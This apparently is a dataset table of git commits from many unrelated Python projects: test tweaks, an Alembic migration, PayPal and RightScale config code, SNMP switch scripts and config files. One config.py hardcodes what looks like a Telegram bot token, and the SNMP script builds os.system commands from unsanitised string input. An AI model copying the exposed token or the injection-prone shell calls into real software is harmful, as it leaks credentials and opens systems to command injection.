commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
|---|---|---|---|---|---|---|---|
5e9224d9f51b8c208f73b7493645fd6aa6b6ef48
|
Removes a typo in a comment: 'not' to 'no'
|
revscoring/features/tests/test_previous_user_revision.py
|
revscoring/features/tests/test_previous_user_revision.py
|
from collections import namedtuple
from mw import Timestamp
from nose.tools import eq_
from ...datasources import previous_user_revision, revision
from ...dependencies import solve
from ..previous_user_revision import seconds_since
def test_seconds_since():
    """Check seconds_since both with and without a previous user revision."""
    FakeRevisionMetadata = namedtuple("FakeRevisionMetadata",
                                      ['timestamp'])

    # Normal case: previous user revision at t=1, current revision at t=10.
    cache = {
        revision.metadata: FakeRevisionMetadata(Timestamp(10)),
        previous_user_revision.metadata: FakeRevisionMetadata(Timestamp(1))
    }
    eq_(solve(seconds_since, cache=cache), 9)

    # Makes sure we don't crash when there was no previous user revision
    cache = {
        revision.metadata: FakeRevisionMetadata(Timestamp(10)),
        previous_user_revision.metadata: None
    }
    eq_(solve(seconds_since, cache=cache), 0)
|
Python
| 0.999674
|
@@ -627,17 +627,16 @@
e was no
-t
previou
|
ae1839cbb521be5cb7e76d87bdd65f1e736ccf8d
|
Add python version of register-result with more robust json serialisation
|
register-result.py
|
register-result.py
|
Python
| 0.000001
|
@@ -0,0 +1,742 @@
+#!/usr/bin/env python%0A%0Aimport json%0Aimport socket%0Aimport sys%0A%0Aif len(sys.argv) %3C 4:%0A print(%22Error: Usage %3Cregister-result%3E %3Cclient%3E %3Cname%3E %3Coutput%3E %3Cstatus%3E %3Cttl%3E%22)%0A sys.exit(128)%0A%0Acheck_client = sys.argv%5B1%5D%0Acheck_name = sys.argv%5B2%5D%0Acheck_output = sys.argv%5B3%5D%0Acheck_status = int(sys.argv%5B4%5D)%0Acheck_ttl = int(sys.argv%5B5%5D) if len(sys.argv) %3E 5 else 90000%0A%0A# Our result dict%0Aresult = dict()%0Aresult%5B'source'%5D = check_client%0Aresult%5B'name'%5D = check_name%0Aresult%5B'output'%5D = check_output%0Aresult%5B'status'%5D = check_status%0Aresult%5B'ttl'%5D = check_ttl%0A%0A# TCP socket%0Asock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0Aserver_address = ('localhost', 3030)%0Asock.connect(server_address)%0Aprint (json.dumps(result))%0Asocket.sendall(json.dumps(result))%0A
|
|
1b36f7e837f6c15cab838edfaf6464bef0c88c6d
|
Add migration for request notification types
|
src/ggrc/migrations/versions/20160304124523_50c374901d42_add_request_notification_types.py
|
src/ggrc/migrations/versions/20160304124523_50c374901d42_add_request_notification_types.py
|
Python
| 0
|
@@ -0,0 +1,1834 @@
+%0A%22%22%22Add request notification types%0A%0ARevision ID: 50c374901d42%0ARevises: 4e989ef86619%0ACreate Date: 2016-03-04 12:45:23.024224%0A%0A%22%22%22%0A%0Aimport sqlalchemy as sa%0Afrom alembic import op%0Afrom sqlalchemy.sql import column%0Afrom sqlalchemy.sql import table%0A%0A# revision identifiers, used by Alembic.%0Arevision = '50c374901d42'%0Adown_revision = '1839dabd2357'%0A%0ANOTIFICATION_TYPES = table(%0A 'notification_types',%0A column('id', sa.Integer),%0A column('name', sa.String),%0A column('description', sa.Text),%0A column('template', sa.String),%0A column('instant', sa.Boolean),%0A column('advance_notice', sa.Integer),%0A column('advance_notice_end', sa.Integer),%0A column('created_at', sa.DateTime),%0A column('modified_by_id', sa.Integer),%0A column('updated_at', sa.DateTime),%0A column('context_id', sa.Integer),%0A)%0A%0Adef upgrade():%0A%0A op.bulk_insert(%0A NOTIFICATION_TYPES,%0A %5B%7B%0A %22name%22: %22request_open%22,%0A %22description%22: (%22Notify all assignees Requesters Assignees and %22%0A %22Verifiers that a new request has been created.%22),%0A %22template%22: %22request_open%22,%0A %22advance_notice%22: 0,%0A %22instant%22: False,%0A %7D, %7B%0A %22name%22: %22request_declined%22,%0A %22description%22: %22Notify Requester that a request has been declined.%22,%0A %22template%22: %22request_declined%22,%0A %22advance_notice%22: 0,%0A %22instant%22: False,%0A %7D, %7B%0A %22name%22: %22request_manual%22,%0A %22description%22: %22Send a manual notification to the Requester.%22,%0A %22template%22: %22request_manual%22,%0A %22advance_notice%22: 0,%0A %22instant%22: False,%0A %7D%5D%0A )%0A%0A%0Adef downgrade():%0A op.execute(%0A NOTIFICATION_TYPES.delete().where(%0A NOTIFICATION_TYPES.c.name.in_(%5B%0A %22request_open%22,%0A %22request_declined%22,%0A %22request_manual%22,%0A %5D)%0A )%0A )%0A
|
|
9665113ef9a6f7fae89b8a0b7b15289ac41996f4
|
Create mySolution.py
|
Puzzles/checkio/Home/Min-and-Max/mySolution.py
|
Puzzles/checkio/Home/Min-and-Max/mySolution.py
|
Python
| 0.000001
|
@@ -0,0 +1,1513 @@
+def minMaxArgs(key, operator, *args): %0A if key == None:%0A key = lambda x : x %0A minMaxVal = args%5B0%5D%0A for arg in args:%0A cmpKey = key(arg)%0A if operator(cmpKey, key(minMaxVal)):%0A minMaxVal = arg%0A return minMaxVal%0A%0Adef minMaxIter(iterable, operator, key):%0A if key == None:%0A key = lambda x : x%0A count = 0%0A for item in iterable:%0A if count == 0:%0A minMaxVal = item%0A count += 1%0A cmpKey = key(item)%0A if operator(cmpKey, key(minMaxVal)):%0A minMaxVal = item%0A return minMaxVal%0A%0Adef minmax(operator, *args, **kwargs):%0A if not hasattr(operator, %22__call__%22):%0A raise TypeError(%22operator must be callable%22)%0A if len(args) == 0:%0A raise TypeError(%22expected at least one argument, got 0 arguments%22)%0A key = lambda x : x%0A if %22key%22 in kwargs:%0A key = kwargs%5B%22key%22%5D%0A if not hasattr(key, %22__call__%22):%0A raise TypeError(%22%25s is not callable%22 %25 type(key))%0A elif len(kwargs) %3E 0:%0A raise ValueError(%22unexpected keyword argument%22)%0A if len(args) == 1 and (hasattr(args%5B0%5D, %22__iter__%22) or hasattr(args%5B0%5D, %22__getitem__%22) or hasattr(args%5B0%5D, %22__next__%22)):%0A return minMaxIter(args%5B0%5D, operator, key)%0A else:%0A return minMaxArgs(key, operator, *args)%0A%0Adef max(*args, **kwargs):%0A return minmax(lambda x, y: x %3E y, *args, **kwargs)%0A%0Adef min(*args, **kwargs):%0A return minmax(lambda x, y: x %3C y, *args, **kwargs)%0A
|
|
770f7759ffa8fee19f27f0ec365a86d11dd1454c
|
Version bump.
|
paypal/settings.py
|
paypal/settings.py
|
# coding=utf-8
"""
This module contains config objects needed by paypal.interface.PayPalInterface.
Most of this is transparent to the end developer, as the PayPalConfig object
is instantiated by the PayPalInterface object.
"""
import logging
import os
from pprint import pformat
from paypal.compat import basestring
from paypal.exceptions import PayPalConfigError
logger = logging.getLogger('paypal.settings')
class PayPalConfig(object):
    """
    The PayPalConfig object is used to allow the developer to perform API
    queries with any number of different accounts or configurations. This
    is done by instantiating paypal.interface.PayPalInterface, passing config
    directives as keyword args.
    """

    # Used to validate correct values for certain config directives.
    _valid_ = {
        'API_ENVIRONMENT': ['SANDBOX', 'PRODUCTION'],
        'API_AUTHENTICATION_MODE': ['3TOKEN', 'CERTIFICATE'],
    }

    # Various API servers.
    _API_ENDPOINTS = {
        # In most cases, you want 3-Token. There's also Certificate-based
        # authentication, which uses different servers, but that's not
        # implemented.
        '3TOKEN': {
            'SANDBOX': 'https://api-3t.sandbox.paypal.com/nvp',
            'PRODUCTION': 'https://api-3t.paypal.com/nvp',
        }
    }

    _PAYPAL_URL_BASE = {
        'SANDBOX': 'https://www.sandbox.paypal.com/webscr',
        'PRODUCTION': 'https://www.paypal.com/webscr',
    }

    API_VERSION = '72.0'

    # Defaults. Used in the absence of user-specified values.
    API_ENVIRONMENT = 'SANDBOX'
    API_AUTHENTICATION_MODE = '3TOKEN'

    # 3TOKEN credentials
    API_USERNAME = None
    API_PASSWORD = None
    API_SIGNATURE = None

    # API Endpoints are just API server addresses.
    API_ENDPOINT = None
    PAYPAL_URL_BASE = None

    # API Endpoint CA certificate chain. If this is True, do a simple SSL
    # certificate check on the endpoint. If it's a full path, verify against
    # a private cert.
    # e.g. '/etc/ssl/certs/Verisign_Class_3_Public_Primary_Certification_Authority.pem'
    API_CA_CERTS = True

    # UNIPAY credentials
    UNIPAY_SUBJECT = None

    ACK_SUCCESS = "SUCCESS"
    ACK_SUCCESS_WITH_WARNING = "SUCCESSWITHWARNING"

    # In seconds. Depending on your setup, this may need to be higher.
    HTTP_TIMEOUT = 15.0

    def __init__(self, **kwargs):
        """
        PayPalConfig constructor. **kwargs catches all of the user-specified
        config directives at time of instantiation. It is fine to set these
        values post-instantiation, too.

        Some basic validation for a few values is performed below, and defaults
        are applied for certain directives in the absence of
        user-provided values.

        :raises PayPalConfigError: If a directive has an invalid value, or a
            required 3TOKEN credential is missing.
        """
        if kwargs.get('API_ENVIRONMENT'):
            api_environment = kwargs['API_ENVIRONMENT'].upper()
            # Make sure the environment is one of the acceptable values.
            if api_environment not in self._valid_['API_ENVIRONMENT']:
                raise PayPalConfigError('Invalid API_ENVIRONMENT')
            else:
                self.API_ENVIRONMENT = api_environment

        if kwargs.get('API_AUTHENTICATION_MODE'):
            auth_mode = kwargs['API_AUTHENTICATION_MODE'].upper()
            # Make sure the auth mode is one of the known/implemented methods.
            if auth_mode not in self._valid_['API_AUTHENTICATION_MODE']:
                choices = ", ".join(self._valid_['API_AUTHENTICATION_MODE'])
                raise PayPalConfigError(
                    "Not a supported auth mode. Use one of: %s" % choices
                )
            else:
                self.API_AUTHENTICATION_MODE = auth_mode

        # Set the API endpoints, which is a cheesy way of saying API servers.
        self.API_ENDPOINT = self._API_ENDPOINTS[self.API_AUTHENTICATION_MODE][self.API_ENVIRONMENT]
        self.PAYPAL_URL_BASE = self._PAYPAL_URL_BASE[self.API_ENVIRONMENT]

        # Set the CA_CERTS location. This can either be a None, a bool, or a
        # string path. Use a membership test rather than truthiness of
        # kwargs.get() so that explicitly passing API_CA_CERTS=None or False
        # (both documented as valid) is honored instead of silently ignored.
        if 'API_CA_CERTS' in kwargs:
            self.API_CA_CERTS = kwargs['API_CA_CERTS']

        if isinstance(self.API_CA_CERTS, basestring) and not os.path.exists(self.API_CA_CERTS):
            # A CA Cert path was specified, but it's invalid.
            raise PayPalConfigError('Invalid API_CA_CERTS')

        # set the 3TOKEN required fields
        if self.API_AUTHENTICATION_MODE == '3TOKEN':
            for arg in ('API_USERNAME', 'API_PASSWORD', 'API_SIGNATURE'):
                if arg not in kwargs:
                    raise PayPalConfigError('Missing in PayPalConfig: %s ' % arg)
                setattr(self, arg, kwargs[arg])

        for arg in ['HTTP_TIMEOUT']:
            if arg in kwargs:
                setattr(self, arg, kwargs[arg])

        logger.debug(
            'PayPalConfig object instantiated with kwargs: %s' % pformat(kwargs)
        )
|
Python
| 0
|
@@ -1464,10 +1464,10 @@
= '
-72
+98
.0'%0A
|
2a21ee4b263692872f11ebae18663119c5041d5e
|
Add test for requirements
|
fuel_agent/tests/test_requirements.py
|
fuel_agent/tests/test_requirements.py
|
Python
| 0.000003
|
@@ -0,0 +1,738 @@
+# -*- coding: utf-8 -*-%0A%0A# Copyright 2015 Mirantis, Inc.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22); you may%0A# not use this file except in compliance with the License. You may obtain%0A# a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS, WITHOUT%0A# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the%0A# License for the specific language governing permissions and limitations%0A# under the License.%0A%0Afrom pkg_resources import require%0A%0A%0Adef test_check_requirements_conflicts():%0A require('fuel_agent')%0A
|
|
1bd9013c925cfbbebcff33bf7796fde729d26b34
|
add cardify script
|
cardify.py
|
cardify.py
|
Python
| 0.000001
|
@@ -0,0 +1,1590 @@
+import os%0Aimport re%0Aimport sys%0Aimport glob%0Aimport errno%0Aimport shutil%0Afrom typing import Dict, Tuple, Union, Any, List, Optional%0Afrom pprint import pprint%0A%0A%0Adef mkdir_p(path: str):%0A try:%0A path = os.path.abspath(path)%0A os.makedirs(path)%0A except OSError as e:%0A if e.errno == errno.EEXIST and os.path.isdir(path):%0A pass%0A else:%0A logger.exception(f'failed at creating directorie(s): %7Bpath%7D')%0A raise e%0A%0A%0Apwd = os.path.abspath(os.path.dirname(__file__))%0Aoutput_dir = f'%7Bpwd%7D/notes/cards'%0Ashutil.rmtree(output_dir)%0Amkdir_p(output_dir)%0A%0A%0Aindex = 0%0Adef write_note(text: str) -%3E str:%0A global index%0A if text.count('%5Cn') %3C 2:%0A return%0A index += 1%0A p = f'%7Boutput_dir%7D/card_%7Bindex:010d%7D.md'%0A with open(p, 'w') as f:%0A prefix = ''.join(%5B'%3Cbr%3E'%5D * 6)%0A f.write(f'%7Bprefix%7D%5Cn%5Cn- ')%0A f.write(text)%0A return p%0A%0A%0Aif __name__ == '__main__':%0A for path in glob.glob(f'%7Bpwd%7D/notes/**/*.md'):%0A if path.endswith('index.md') or path.startswith(output_dir):%0A continue%0A print(f'processing %7Bpath%7D...')%0A with open(path) as f:%0A for i, p in enumerate(re.split('%5Cn- ', f.read())%5B1:%5D):%0A write_note(p)%0A%0A cards = sorted(glob.glob(f'%7Boutput_dir%7D/card*.md'))%0A print(f'wrote #%7Blen(cards)%7D cards, writing index.md...', end=' ')%0A with open(f'%7Boutput_dir%7D/index.md', 'w') as f:%0A f.write('# Cards%5Cn')%0A for card in cards:%0A basename = os.path.basename(card)%0A f.write(f'%5Cn- %5B%7Bbasename%7D%5D(%7Bbasename%7D)')%0A print('done')
|
|
fddbbc536ad5097769d924d49420e7d5d2e5999f
|
Update app/extensions/minify/__init__.py
|
app/extensions/minify/__init__.py
|
app/extensions/minify/__init__.py
|
Python
| 0
|
@@ -0,0 +1,1068 @@
+from htmlmin import Minifier%0A%0A%0Aclass HTMLMIN(object):%0A def __init__(self, app=None, **kwargs):%0A self.app = app%0A if app is not None:%0A self.init_app(app)%0A%0A default_options = %7B%0A 'remove_comments': True,%0A 'reduce_empty_attributes': True,%0A 'remove_optional_attribute_quotes': False%0A %7D%0A default_options.update(kwargs)%0A%0A self.html_minify = Minifier(%0A **default_options)%0A%0A def init_app(self, app):%0A app.config.setdefault('MINIFY_PAGE', True)%0A%0A if app.config%5B'MINIFY_PAGE'%5D:%0A app.after_request(self.response_minify)%0A%0A def response_minify(self, response):%0A %22%22%22%0A minify response html to decrease traffic%0A %22%22%22%0A if response.content_type == u'text/html; charset=utf-8':%0A response.direct_passthrough = False%0A%0A raw_data = response.get_data(as_text=True)%0A%0A response.set_data(%0A self.html_minify.minify(raw_data)%0A )%0A%0A return response%0A return response%0A
|
|
118a4af7fbc2455d1dcde54e7041a3919f760d69
|
Create switch_controls_snmp.py
|
python-mocutils/mocutils/switch_controls_snmp.py
|
python-mocutils/mocutils/switch_controls_snmp.py
|
Python
| 0.000002
|
@@ -0,0 +1,1297 @@
+#! /usr/bin/python%0Aimport os%0A%0Adef make_remove_vlans(vlan_ids,add,switch_ip='192.168.0.1',community='admin'):%0A%09# Expects that you send a string which is a comma separated list of vlan_ids and a bool for adding or removing%0A%09OID_portVlanId='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.1'%0A%09OID_portVlanStatus='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.6'%0A%09for vlan_id in vlan_ids.split(','):%0A%09%09if add:%0A%09%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_portVlanId+'.'+vlan_id+' i '+vlan_id)%0A%09%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_portVlanStatus+'.'+vlan_id+' i 4')%0A%09%09else:%0A%09%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_portVlanStatus+'.'+vlan_id+' i 6')%0Adef edit_ports_on_vlan(port_ids,vlan_id,add,switch_ip='192.168.0.1',community='admin'):%0A%09# Expects that you send a comma separated list of ports%0A %09# A string for vlan_id%0A %09# And a bool for adding (True = adding, False = Removing)%0A%09OID_vlanUntagPortMemberAdd='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.4'%0A%09OID_vlanPortMemberRemove='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.5'%0A%09if add:%0A%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_vlanUntagPortMemberAdd+'.'+vlan_id+' s '+'%22'+port_ids+'%22')%0A%09else:%0A%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_vlanPortMemberRemove+'.'+vlan_id+' s '+'%22'+port_ids+'%22')%0A
|
|
f009f42c168e396e437e08914dc28eb1e08fb7fe
|
test of c++ wavefront code on big donut
|
test/test-bigdonut-cpp.py
|
test/test-bigdonut-cpp.py
|
Python
| 0
|
@@ -0,0 +1,1043 @@
+###%0A### Script for fitting a BIG donut%0A###%0A%0Aimport numpy as np%0A%0Afrom donutlib.donutfit import donutfit%0A%0AfitinitDict = %7B%22nZernikeTerms%22:15,%22fixedParamArray1%22:%5B0,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%5D,%22fixedParamArray2%22:%5B0,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%5D,%22fixedParamArray3%22:%5B0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%5D,%22nFits%22:3,%22nPixels%22:256,%22nbin%22:2048,%22scaleFactor%22:1.0,%22pixelOverSample%22:8,%22iTelescope%22:0,%22inputrzero%22:0.15,%22outputWavefront%22:True,%22debugFlag%22:False,%22gain%22:4.5,%22wavefrontMapFile%22 : %22/Users/roodman/Astrophysics/Donuts/decam_2012-nominalzernike.pickle%22, %22doGridFit%22:True, %22spacing%22:64%7D%0A%0Adf = donutfit(**fitinitDict)%0A%0A# fit donut%0AfitDict = %7B%7D%0AfitDict%5B%22inputFile%22%5D = 'DECam_00236392.S4.0003.stamp.fits'%0AfitDict%5B%22outputPrefix%22%5D = 'DECam_wave_00236392.S4.0003'%0AfitDict%5B%22inputrzero%22%5D = 0.125%0AfitDict%5B%22inputZernikeDict%22%5D = %7B%22S4%22:%5B0.0,0.0,53.0%5D,%22None%22:%5B0.0,0.0,11.0%5D%7D%0Adf.setupFit(**fitDict)%0A%0Adf.gFitFunc.closeFits()%0A%0A
|
|
2f2e7605d87ef06c547df660805abb99835dee18
|
Add a snippet.
|
python/pyqt/pyqt5/widget_QAction.py
|
python/pyqt/pyqt5/widget_QAction.py
|
Python
| 0.000002
|
@@ -0,0 +1,1242 @@
+#!/usr/bin/env python3%0A# -*- coding: utf-8 -*-%0A%0Aimport sys%0Afrom PyQt5.QtCore import Qt%0Afrom PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QAction, QSizePolicy%0A%0Aapp = QApplication(sys.argv)%0A%0A# The default constructor has no parent.%0A# A widget with no parent is a window.%0Awindow = QMainWindow()%0A%0Awindow.setWindowTitle('Hello')%0A%0Alabel = QLabel(%22Press Ctrl+P to print a message on the terminal%22, window)%0Alabel.resize(800, 100)%0A%0A# Set key shortcut ################################%0A%0Adef action_callback():%0A print(%22Hello!%22)%0A%0A%0A# see https://stackoverflow.com/a/17631703 and http://doc.qt.io/qt-5/qaction.html#details%0A%0Aaction = QAction(label) # %3C-%0Aaction.setShortcut(Qt.Key_P %7C Qt.CTRL) # %3C-%0A%0Aaction.triggered.connect(action_callback) # %3C-%0Alabel.addAction(action) # %3C-%0A%0A###################################################%0A%0Awindow.show()%0A%0A# The mainloop of the application. The event handling starts from this point.%0A# The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead. %0Aexit_code = app.exec_()%0A%0A# The sys.exit() method ensures a clean exit.%0A# The environment will be informed, how the application ended.%0Asys.exit(exit_code)%0A
|
|
75a9584cc859d60c598582b382f41bd685579072
|
add a new config file at the project root
|
config.py
|
config.py
|
Python
| 0
|
@@ -0,0 +1,217 @@
+import os%0A%0APYMICRO_ROOT_DIR = os.path.abspath(os.curdir)%0APYMICRO_EXAMPLES_DATA_DIR = os.path.join(PYMICRO_ROOT_DIR, 'examples', 'data')%0APYMICRO_XRAY_DATA_DIR = os.path.join(PYMICRO_ROOT_DIR, 'pymicro', 'xray', 'data')
|
|
8212faa90328daabb85c7e877942a667aa200119
|
add config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,1982 @@
+import configparser%0D%0Aimport datetime%0D%0A%0D%0A__all__ = %5B'blog_name', 'categories', 'dates', 'article_num'%5D%0D%0A%0D%0Aconfig = configparser.ConfigParser()%0D%0Aconfig.read('blog.ini', encoding='utf-8')%0D%0A%0D%0ADEFAULT = config%5B'DEFAULT'%5D%0D%0Ablog_name = DEFAULT.get('blog_name', %22No Name Here%22)%0D%0Apre_category_name = DEFAULT.get('category_name', %22%22) # type: str%0D%0Apre_category_links = DEFAULT.get('category_links', %22%22) # type: str%0D%0Afrom_date = DEFAULT.get('from_date', '201610')%0D%0A%0D%0A# year and month from config%0D%0Afrom_year = int(from_date%5B:4%5D)%0D%0Afrom_month = int(from_date%5B4:%5D)%0D%0Aassert 1 %3C= from_month %3C= 12 and 1970 %3C from_year %3C 9999, 'wrong from_date'%0D%0A%0D%0A# create from_datetime and to_datetime%0D%0Afrom_datetime = datetime.datetime(from_year, from_month, 1)%0D%0Ato_datetime = datetime.datetime.now()%0D%0A%0D%0A# add_month_num%0D%0Aadd_month_num = 3%0D%0A%0D%0A# a function that get year and month after add months%0D%0Adef add_month(year, month, add_num):%0D%0A month = month + add_num%0D%0A if month %3E 12:%0D%0A year += 1%0D%0A month -= 12%0D%0A elif month %3C= 0:%0D%0A year -= 1%0D%0A month += 12%0D%0A return year, month%0D%0A%0D%0A# get dates%0D%0Adates = %5B%5D%0D%0Awhile from_datetime %3C to_datetime:%0D%0A link = '/t/' + str(from_datetime.timestamp())%0D%0A name_start = '%7B%7D%E5%B9%B4%7B%7D%E6%9C%88'.format(str(from_datetime.year), str(from_datetime.month))%0D%0A new_year, new_month = add_month(from_datetime.year, from_datetime.month, add_month_num)%0D%0A from_datetime = datetime.datetime(new_year, new_month, 1) # new from_datetime%0D%0A%0D%0A to_year, to_month = add_month(from_datetime.year, from_datetime.month, -1)%0D%0A name_end = '%7B%7D%E5%B9%B4%7B%7D%E6%9C%88'.format(str(to_year), str(to_month))%0D%0A link += '_to_' + str(from_datetime.timestamp())%0D%0A dates.append((link, name_start+' %E8%87%B3 '+name_end))%0D%0A%0D%0A# get categories%0D%0Acategory_name = %5Bx.strip() for x 
in pre_category_name.split('%7C')%5D%0D%0Acategory_links = %5B'/c/'+x.strip() for x in pre_category_links.split('%7C')%5D%0D%0Acategories = list(zip(category_links, category_name))%0D%0A%0D%0A# get article_num%0D%0Aarticle_num = DEFAULT%5B'article_num'%5D%0D%0A
|
|
5259453165cca4767743469b5e77c6eabe444839
|
add config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,382 @@
+class Config(object):%0A DEBUG = False%0A TESTING = False%0A CSRF_ENABLED = True%0A SECRET_KEY = 'this-really-needs-to-be-changed'%0A%0A%0Aclass ProductionConfig(Config):%0A DEBUG = False%0A%0A%0Aclass StagingConfig(Config):%0A DEVELOPMENT = True%0A DEBUG = True%0A%0A%0Aclass DevelopmentConfig(Config):%0A DEVELOPMENT = True%0A DEBUG = True%0A%0A%0Aclass TestingConfig(Config):%0A TESTING = True
|
|
979d0906ba1bc7f3ec3e77a6e09ec8a1a2449323
|
add clean config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,882 @@
+import os%0A%0Aworkspace = os.getcwd()%0A%0Agnu_CC = 'gcc'%0Agnu_CXX = 'g++'%0A%0Aclang_CC = 'clang'%0Aclang_CXX = 'clang++'%0A%0Aintel_CC = 'icc'%0Aintel_CXX = 'icpc'%0A%0Ampi_CC = 'mpicc'%0Ampi_CXX = 'mpic++'%0A%0A# keywords are: $mpi_nprocs, $ncores%0Ampi_RUN = 'mpirun -hostfile hostfile -np $mpi_nprocs'%0A%0Acore_per_node = 2%0A# tmp dir to launch a run.%0Atmp_dir = os.path.join(workspace, 'tmp')%0A# tmp dir to store results after a run.%0Aresults_dir = os.path.join(workspace, 'results')%0A%0A## Cases directory, makes life easier when they're distinct.%0Acase_ic = os.path.join(workspace, 'casepy') # Where the python scripts to build initial condition are.%0Acase_input = os.path.join(workspace, 'caseinput') # Where the built initial conditions are (heady) %0Acase_ref = os.path.join(workspace, 'caseref') # Where the references (results to compare with) are%0A%0A#What you can add in your hostfile for mpirun.%0A#localhost slots=4%0A
|
|
47b88e59781cf2aeb1a4bb3b6b97ceaf6b883820
|
Add prime count
|
cpp_10.py
|
cpp_10.py
|
Python
| 0.99981
|
@@ -0,0 +1,657 @@
+first_number = int(input())%0A%0Aif 0 == int(first_number):%0A print('none')%0A exit()%0A%0Aprime_count = '' %0A%0Awhile True:%0A%0A if 2 == first_number:%0A prime_count = '2'%0A break%0A%0A running_number = first_number%0A divider = first_number // 2 if ( 0 == first_number %25 2 ) else ( first_number // 2 ) + 1;%0A count = 0%0A%0A while divider != 1:%0A if 0 == running_number %25 divider:%0A count += 1%0A%0A divider -= 1%0A%0A if count == 0:%0A prime_count += ' ' + str( running_number )%0A%0A first_number -= 1%0A if 1 == first_number:%0A break%0A%0Ap = ''%0Afor c in prime_count.strip().split():%0A p = c + ' ' + p%0Aprint( p.strip() )%0A
|
|
ccac9cddfad2b883fc8e2c7c8ab27607ba8c4c63
|
Create config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,958 @@
+token = '252128496:AAHUDCZJlHpd21b722S4B_n6prn8RUjy4'%0Ais_sudo = '223404066' #@This_Is_Amir%0Arelam = '-133494595'%0A# ___ __ __ _ _ _ _____ %0A# / _ %5C / _%7C/ _%7C %7C (_) %5C %7C %7C __%7C_ _%7C__ __ _ _ __ ___ %0A#%7C %7C %7C %7C %7C_%7C %7C_%7C %7C %7C %7C %5C%7C %7C/ _ %5C%7C %7C/ _ %5C/ _ %7C _ _ %5C %0A#%7C %7C_%7C %7C _%7C _%7C %7C___%7C %7C %7C%5C %7C __/%7C %7C __/ (_%7C %7C %7C %7C %7C %7C %7C %0A #%5C___/%7C_%7C %7C_%7C %7C_____%7C_%7C_%7C %5C_%7C%5C___%7C%7C_%7C%5C___%7C%5C__,_%7C_%7C %7C_%7C %7C_%7C %0A %0A
|
|
9fae2d4c7ecc35bde8079f5a71a2b369690cd9a3
|
add config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,426 @@
+import os%0Aimport stripe%0A%0Astripe_keys = %7B%0A 'secret_key': os.environ%5B'SECRET_KEY'%5D,%0A 'publishable_key': os.environ%5B'PUBLISHABLE_KEY'%5D%0A%7D%0A%0ASALESFORCE = %7B%0A %22CLIENT_ID%22: os.environ%5B 'SALESFORCE_CLIENT_ID' %5D,%0A %22CLIENT_SECRET%22: os.environ%5B 'SALESFORCE_CLIENT_SECRET' %5D,%0A %22USERNAME%22: os.environ%5B 'SALESFORCE_USERNAME' %5D,%0A %22PASSWORD%22: os.environ%5B 'SALESFORCE_PASSWORD' %5D,%0A %22HOST%22: os.environ%5B %22SALESFORCE_HOST%22 %5D%0A%7D%0A
|
|
298f7d65ba29a0524ff2a3f8eb4b564ed91ad057
|
Document find_by_name so I remember what to do with it.
|
rightscale/util.py
|
rightscale/util.py
|
import os.path
import ConfigParser
CFG_USER_RC = '.rightscalerc'
CFG_SECTION_OAUTH = 'OAuth'
CFG_OPTION_ENDPOINT = 'api_endpoint'
CFG_OPTION_REF_TOKEN = 'refresh_token'
_config = None
class HookList(list):
    # Plain list subclass — presumably exists so arbitrary attributes can be
    # attached to list-shaped API results (builtin list forbids new
    # attributes). TODO(review): confirm against callers.
    pass
class HookDict(dict):
    # Plain dict subclass — presumably exists so arbitrary attributes can be
    # attached to dict-shaped API results (builtin dict forbids new
    # attributes). TODO(review): confirm against callers.
    pass
def get_config():
    """
    Return the process-wide ConfigParser, loading ~/.rightscalerc on first use.

    The parsed config is cached in the module-level ``_config``; subsequent
    calls return the same object.
    """
    global _config
    if _config:
        return _config

    parser = ConfigParser.SafeConfigParser()
    # Seed blank defaults by hand - too bad only newer pythons know how to do
    # this more gracefully.
    parser.add_section(CFG_SECTION_OAUTH)
    for option in (CFG_OPTION_ENDPOINT, CFG_OPTION_REF_TOKEN):
        parser.set(CFG_SECTION_OAUTH, option, '')

    rc_file = os.path.join(os.path.expanduser('~'), CFG_USER_RC)
    parser.read(rc_file)

    _config = parser
    return _config
def get_rc_creds():
    """
    Reads ~/.rightscalerc and returns API endpoint and refresh token.

    Always returns a tuple of strings even if the file is empty - in which
    case, returns ``('', '')``.
    """
    config = get_config()
    try:
        return (
            config.get(CFG_SECTION_OAUTH, CFG_OPTION_ENDPOINT),
            config.get(CFG_SECTION_OAUTH, CFG_OPTION_REF_TOKEN),
        )
    except ConfigParser.Error:
        # config.get() raises NoSectionError/NoOptionError (both subclasses
        # of ConfigParser.Error) for a missing/empty rc file. Catch only
        # those: the previous bare `except:` also hid unrelated bugs and
        # swallowed KeyboardInterrupt/SystemExit.
        return ('', '')
def find_href(obj, rel):
    """
    Return the href of the first link in ``obj`` whose rel equals ``rel``.

    :param dict obj: A resource dict that may carry a ``links`` list of
